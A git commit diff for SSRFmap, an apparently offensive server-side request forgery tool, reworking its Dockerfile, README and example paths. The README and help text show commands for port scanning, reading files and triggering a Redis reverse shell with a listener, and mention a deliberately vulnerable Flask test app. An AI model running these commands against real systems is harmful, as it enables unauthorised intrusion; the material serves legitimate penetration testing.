Dockerfile reworked + examples

pull/53/head
Swissky 2024-06-08 20:48:06 +02:00
parent 3eacb5d729
commit 7a04c5bb60
11 changed files with 72 additions and 48 deletions

3
.gitignore vendored
View File

@ -104,3 +104,6 @@ venv.bak/
# mypy
.mypy_cache/
# artifacts
127.0.0.1_5000/

View File

@ -1,9 +1,14 @@
FROM python:3-alpine3.10
FROM python:3.12.4-alpine
WORKDIR /opt
WORKDIR /usr/src/app
COPY . /usr/src/app
RUN apk update && apk add git
RUN git clone https://github.com/swisskyrepo/SSRFmap.git
RUN cd /opt/SSRFmap && pip install -r requirements.txt
RUN apk update && apk add curl
ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
# Install requirements
RUN pip install -r requirements.txt
# Downgrade privileges
USER 1000
ENTRYPOINT ["python3"]

View File

@ -45,37 +45,45 @@ The following modules are already implemented and can be used with the `-m` argu
## Install and Manual
Basic install from the Github repository.
* From the Github repository.
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
-v [VERBOSE] Enable verbosity
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--uagent USERAGENT User Agent to use
--ssl [SSL] Use HTTPS without verification
--proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080)
--level [LEVEL] Level of test to perform (1-5, default: 1)
```
* Docker
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ docker build --no-cache -t ssrfmap .
$ docker run -it ssrfmap ssrfmap.py [OPTIONS]
$ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
```
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
-v [VERBOSE] Enable verbosity
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--uagent USERAGENT User Agent to use
--ssl [SSL] Use HTTPS without verification
--proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080)
--level [LEVEL] Level of test to perform (1-5, default: 1)
```
## Examples
First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap.
They should look like the following. More examples are available in the **/data** folder.
They should look like the following. More examples are available in the **./examples** folder.
```powershell
POST /ssrf HTTP/1.1
@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
```powershell
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
```
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
```powershell
# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
```
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
```powershell
# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
@ -127,10 +135,19 @@ When the target is protected by a WAF or some filters you can try a wide range o
A quick way to test the framework can be done with `data/example.py` SSRF service.
```powershell
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
```
* Local
```powershell
FLASK_APP=examples/example.py flask run &
python ssrfmap.py -r examples/request.txt -p url -m readfiles
```
* Docker
```ps1
docker build --no-cache -t ssrfmap .
docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
```
## Contribute

View File

@ -1,9 +1,8 @@
# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
# NOTE: this file should become a simple ssrf example in order to test SSRFmap
# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
# NOTE: SSRF examples script
# FLASK_APP=example.py flask run
from flask import Flask, abort, request
import json
from flask import Flask, request
import re
import subprocess

View File

@ -1,2 +1,2 @@
Flask==2.3.2
requests==2.21.0
Flask==3.0.3
requests==2.31.0

View File

@ -17,11 +17,11 @@ def display_banner():
def parse_args():
example_text = '''Examples:
python ssrfmap.py -r data/request2.txt -p url -m portscan
python ssrfmap.py -r data/request.txt -p url -m redis
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
python ssrfmap.py -r examples/request2.txt -p url -m portscan
python ssrfmap.py -r examples/request.txt -p url -m redis
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles
'''
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")